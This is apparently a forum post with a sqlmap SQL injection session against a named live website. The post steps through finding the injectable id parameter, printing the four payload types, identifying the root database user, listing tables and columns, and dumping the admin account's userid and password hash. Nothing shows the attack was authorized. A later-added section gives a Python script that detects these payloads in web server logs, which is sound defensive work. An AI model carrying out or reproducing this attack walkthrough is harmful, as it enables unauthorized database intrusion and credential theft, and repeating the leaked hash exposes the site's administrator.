sqlmap injection example against MySQL

OP, posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: fetch the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* fetch the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* fetch the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* fetch the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
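The session above shows what the four sqlmap techniques (boolean-based blind, error-based, UNION and time-based blind) look like from the attacker's terminal. The script below is an added example, not part of the original post or of sqlmap, that looks at the same run from the web server's side: it parses Apache combined-format access log lines, URL-decodes each request's query string and flags the signature of each technique, then groups hits per client IP so that a single client exercising several distinct techniques stands out. The log lines are constructed by me (203.0.113.x and 198.51.100.x are documentation ranges) and the regexes are my own assumptions about the payload shapes seen above, not a published sqlmap signature set.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signature classes mirroring the four techniques sqlmap reported in the session.
# Applied to the URL-decoded query string. These regexes are this example's
# assumption about the payload shapes, not an official rule set.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),      # AND 799=799
    "error-based":   re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "union":         re.compile(r"UNION\s+(ALL\s+)?SELECT\b.*\bNULL\b", re.I),
    "time-blind":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

# Apache "combined" log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not real traffic): one client runs the four techniques
# against /article.php?id=, a second client browses normally.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20%28SELECT%208404%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 312',
    '203.0.113.7 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 HTTP/1.1" 200 4870',
    '203.0.113.7 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Apr/2013:16:54:01 +0800] "GET /article.php?id=277 HTTP/1.1" 200 5011',
    '198.51.100.9 - - [04/Apr/2013:16:54:02 +0800] "GET /search.php?q=random%20AND%20more HTTP/1.1" 200 800',
]


def classify_request(target):
    """Return the set of signature classes matched by one request target (path + query)."""
    query = urlsplit(target).query
    # Decode twice: payloads arrive URL-encoded once, and double-encoding is a common
    # evasion trick; over-decoding a plain query string is harmless for matching.
    decoded = unquote_plus(unquote_plus(query))
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def scan_log(lines):
    """Group flagged requests by client IP: {ip: {signature_class: count}}."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = classify_request(m.group("target"))
        if not hits:
            continue
        per_ip = report.setdefault(m.group("ip"), {})
        for name in hits:
            per_ip[name] = per_ip.get(name, 0) + 1
    return report


def likely_sqlmap_scan(per_ip_counts, min_classes=2):
    """One client exercising several distinct technique classes in the same window is the
    footprint a sqlmap run leaves; a single tautology alone may be a false positive."""
    return len(per_ip_counts) >= min_classes


if __name__ == "__main__":
    for ip, counts in scan_log(SAMPLE_LOG).items():
        verdict = "probable automated SQLi scan" if likely_sqlmap_scan(counts) else "review"
        print(ip, counts, verdict)
```

On real logs the requests' timestamps would sit within seconds of each other, as in the session above; adding a time window to `likely_sqlmap_scan` is the natural next refinement, and the 500 status on the error-based request is a second, independent signal worth alerting on.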